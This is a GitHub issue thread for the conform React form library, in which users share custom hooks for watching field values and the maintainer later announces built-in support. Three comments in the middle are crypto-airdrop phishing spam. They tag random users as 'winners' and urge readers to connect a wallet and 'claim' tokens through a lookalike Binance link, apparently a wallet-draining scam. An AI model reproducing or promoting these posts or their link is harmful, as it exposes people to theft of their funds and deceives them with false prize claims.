### ISSUE TITLE
subscribe to field value ?

### ISSUE THREAD

**Issue by iammemon** [edmundhung/conform#157]
I need to subscribe to field values when they change currently the only way is to manage my own state and listen to `onChange` event which works but it becomes ugly really quick when I need to subscribe to multiple fields. Is there any easier way to achieve this I am looking for an API similar to https://www.react-hook-form.com/api/usewatch/

**Comment by edmundhung** [comment]
Conform does not storage any field value at the moment. If you find it ugly to set up a listener for each field, you can also utilise event delegation like this:

```tsx
function example() {
  const [state, setState] = useState({});

  return (
    <form
      onChange={event => 
         const { name, value } = event.target;

         // Only update the state for the wanted fields
         if (name === 'field1' || name === 'field2') {
           setState(prev => ({ ...prev, [name]: value }));
         }
      }}
    >
      {/* ... */}
    </form>
  );
}
```

**Comment by jaruesink** [comment]
@edmundhung I was looking for real time value watching too. I tried using the ref, but it waits for the revalidation to happen before react re-renders with the new values. But onChange event should help me for now!

**Comment by jaruesink** [comment]
For anyone who is more advanced and stumbles upon this, here is the way we are approaching this currently:

```
import { Submission, isFieldElement, useForm } from '@conform-to/react';
import type { FormConfig } from '@conform-to/react/hooks';
import { getFieldsetConstraint, parse } from '@conform-to/zod';
import { Slot } from '@radix-ui/react-slot';
import { createContext, useContext, useMemo, useState } from 'react';
import type { FormEvent, ReactNode } from 'react';
import { ZodType } from 'zod/lib/types';
import { selectFormDataFromFormElement } from './Field.helpers';
import { getFormEncType, getFormMethod } from '@conform-to/dom';
import { z } from 'zod';

export const FormContext = createContext<{
  form: ReturnType<typeof useForm>[0];
  fields: ReturnType<typeof useForm>[1];
  formValues: Record<string, any>;
} | null>(null);

export const useFormContext = () => {
  const formContext = useContext(FormContext);

  if (!formContext) {
    throw new Error(
      'FormContext is undefined, please ensure you are within a FormContext.Provider'
    );
  }

  return formContext;
};

export interface ConformFormProps extends FormConfig<any, any> {
  children?: ReactNode | undefined;
  validationSchema?: ZodType | ((formData: any) => ZodType);
  asChild?: boolean;
  className?: string;
  error?: string;
  reinitializeDefaultValues?: boolean;
  onChange?: (formData: any) => void;
}

export const Form = ({
  asChild = false,
  children,
  validationSchema,
  className,
  error,
  onChange,
  defaultValue,
  onSubmit,
  reinitializeDefaultValues = true,
  ...props
}: ConformFormProps) => {
  const initialValue = useMemo(() => defaultValue, []);

  const [formValues, setFormValues] =
    useState<Record<string, any>>(defaultValue);

  const schema =
    typeof validationSchema === 'function'
      ? validationSchema(formValues)
      : validationSchema || z.any();

  const handleFormSubmit: (
    event: FormEvent<HTMLFormElement>,
    context: {
      formData: FormData;
      submission: Submission;
      action: string;
      encType: ReturnType<typeof getFormEncType>;
      method: ReturnType<typeof getFormMethod>;
    }
  ) => void = (e, ctx) => {
    e.preventDefault();
    if (typeof onSubmit === 'function') onSubmit(e, ctx);
  };

  const formConfig: FormConfig<any, any> = {
    shouldValidate: 'onBlur',
    constraint: getFieldsetConstraint(schema),
    onValidate: ({ formData }) => {
      const result = parse(formData, { schema });
      return result;
    },
    defaultValue: reinitializeDefaultValues ? defaultValue : initialValue,
    onSubmit: onSubmit ? handleFormSubmit : undefined,
    ...props,
  };

  const [form, fields] = useForm(formConfig);

  form.error = error || form.error; // Note: this allows for form level errors to be held in the context

  const handleFormChange: React.FormEventHandler<HTMLElement> &
    React.FormEventHandler<HTMLFormElement> = (e) => {
    if (isFieldElement(e.target)) {
      const formElement = e.target.form;

      const formData = selectFormDataFromFormElement(
        formElement as HTMLFormElement,
        schema
      );
      setFormValues(formData || {});

      if (typeof onChange === 'function') onChange(formData);
    }
  };

  const FormComponent = asChild ? Slot : 'form';

  return (
    <FormContext.Provider value={{ form, fields, formValues }}>
      <FormComponent
        className={className}
        {...form.props}
        onChange={handleFormChange}
      >
        {children}
      </FormComponent>
    </FormContext.Provider>
  );
};
```

**Comment by jasperbuss** [comment]
This is an approach according to @albert-schilling ´s idea of using a costum hook that listen to form change events: 
`import { useEffect, useState } from 'react'

const getInitValues = (fieldIds: Array<string>) => {
  return fieldIds.reduce((res, currentFieldId) => {
    const value = document
      .getElementById(currentFieldId)
      ?.attributes.getNamedItem('value')?.nodeValue
    return { ...res, [currentFieldId]: value }
  }, {})
}

export const useFormFieldValues = (fieldIds: Array<string>) => {
  const [values, setValues] = useState<Record<string, string>>({})
  useEffect(() => {
    setValues(getInitValues(fieldIds))
  }, [fieldIds])

  useEffect(() => {
    const handleFormChange = (event: Event) => {
      const target = event.target as HTMLInputElement
      if (fieldIds.includes(target.id)) {
        setValues(_value => ({ ..._value, [target.id]: target.value }))
      }
    }
    document.addEventListener('change', handleFormChange)
    return () => {
      document.removeEventListener('change', handleFormChange)
    }
  }, [fieldIds])
  return values
}
` 

You can read the elements id from the respective config. 
Using the hook, make sure to memoize the passed id´s as follows: 

`  const elementIds = useMemo(
    () => [foo?.id, bar?.id],
    [foo?.id, bar?.id]
  )
  const values = useFormFieldValues(elementIds)`

**Comment by tobiasfoerg** [comment]
I played around with a custom hook for subscribing to custom props. 
Here is the result. 
@edmundhung feel free to add that to conform. Or i can create a PR if you want. 

```ts
import * as React from "react";
import type { Get } from "type-fest";

import type { Path } from "./types";
import { getFormElement, getPaths, isFieldElement, parse } from "@conform-to/dom";

export function useWatch<Output extends Record<string, any>, P extends Path<Output>>(
	ref: React.RefObject<HTMLFormElement>,
	path: P,
	parseFn: (formData: FormData) => Output = (formData) => parse(formData).payload as Output,
) {
	function getSnapshot() {
		if (!ref.current) {
			return undefined;
		}

		const formData = new FormData(ref.current);
		const paths = getPaths(path);

		let current: any = parseFn(formData).payload;
		while (paths.length > 0) {
			const path = paths.shift()!;
			current = current[path];
			if (!current) {
				return undefined;
			}
		}
		return current as Get<Output, P>;
	}

	function subscribe(listen: () => void): () => void {
		function handleInput(event: Event) {
			const form = getFormElement(ref.current);
			const element = event.target;
			if (!isFieldElement(element) || element.form !== form || !element.name.startsWith(path)) {
				return;
			}
			listen();
		}

		document.addEventListener("input", handleInput);
		return () => {
			document.removeEventListener("input", handleInput);
		};
	}

	return React.useSyncExternalStore(subscribe, getSnapshot, getSnapshot);
}

```

```ts
export type IsAny<T> = unknown extends T ? ([keyof T] extends [never] ? false : true) : false;

type ExcludeArrayKeys<T> = T extends ArrayLike<any> ? Exclude<keyof T, keyof any[]> : keyof T;

type PathImpl<T, Key extends keyof T> = Key extends string
	? IsAny<T[Key]> extends true
		? never
		: T[Key] extends Record<string, any>
		?
				| `${Key}.${PathImpl<T[Key], ExcludeArrayKeys<T[Key]>> & string}`
				| `${Key}.${ExcludeArrayKeys<T[Key]> & string}`
		: never
	: never;

type PathImpl2<T> = PathImpl<T, keyof T> | keyof T;

export type Path<T> = keyof T extends string
	? PathImpl2<T> extends infer P
		? P extends string | keyof T
			? P
			: keyof T
		: keyof T
	: never;
```

**Comment by hauptrolle** [comment]
If we get a `useWatch` we should also get a `setValue` to set a field value based on some conditions.

**Comment by danestves** [comment]
For anyone trying to do the same, I just made a simple hook here:

```tsx
import { useEffect, useState } from 'react'

export function useWatch<T>({ form }: { form: React.RefObject<HTMLFormElement> }) {
	const [values, setValues] = useState<T>()

	useEffect(() => {
		const formEl = form.current ?? undefined

		if (!formEl) return

		function handleChange() {
			const formData = new FormData(formEl)
			const values = Object.fromEntries(formData.entries())
			setValues(values as T)
		}

		formEl.addEventListener('input', handleChange)

		return () => formEl.removeEventListener('input', handleChange)
	}, [form])

	useEffect(() => {
		const formEl = form.current

		if (!formEl) return

		const formData = new FormData(formEl)
		const values = Object.fromEntries(formData.entries())
		setValues(values as T)
	}, [form])

	return values
}
```

**Comment by adaboese** [comment]
Thank you this snippet helped a lot!

**Comment by adaboese** [comment]
:-( this has been really painful so far. Wish this part was easier

**Comment by edmundhung** [comment]
You can find an implementation of the value state on the [Form Context RFC](https://github.com/edmundhung/conform/discussions/331).

**Comment by adaboese** [comment]
@danestves How to use `useWatch`? specifically, where do I get the `form` reference from? I tried passing `form.ref` from conform, but that does not work.

**Comment by Idris933** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @dwook, @lykovaleksey, @Yashwanthv21, @tomatowax, @nulldataset, @hierophantos, @wyx2333333

**Comment by Idris933** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @huyiya, @vluna, @muntasirsyed, @devonzuegel, @rahulpandey70, @mmvanheusden, @abell95

**Comment by karmalntest** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @FaysalM, @vvnraman, @naqvijafar91, @0xShin0221, @novaeye, @artshell, @kyken

**Comment by edmundhung** [comment]
We have release [v1.0.0-rc.0](https://github.com/edmundhung/conform/releases/tag/v1.0.0-rc.0) with support to subscribe the field value through `fields.something.value`.

**Comment by edmundhung** [comment]
This is now available on v1.0.0! I hope you like it :)

**Comment by punkpeye** [comment]
@edmundhung If I have a field list, how can I watch the updates?

```
const envVariableFieldList = fields.envVariables.getFieldList();
```

**Comment by punkpeye** [comment]
@edmundhung I've tried _everything_. No clue how to achieve this.

**Comment by mjadczak** [comment]
@punkpeye Have you tried `fields.envVariables.value`?

**Comment by punkpeye** [comment]
It doesn't change.
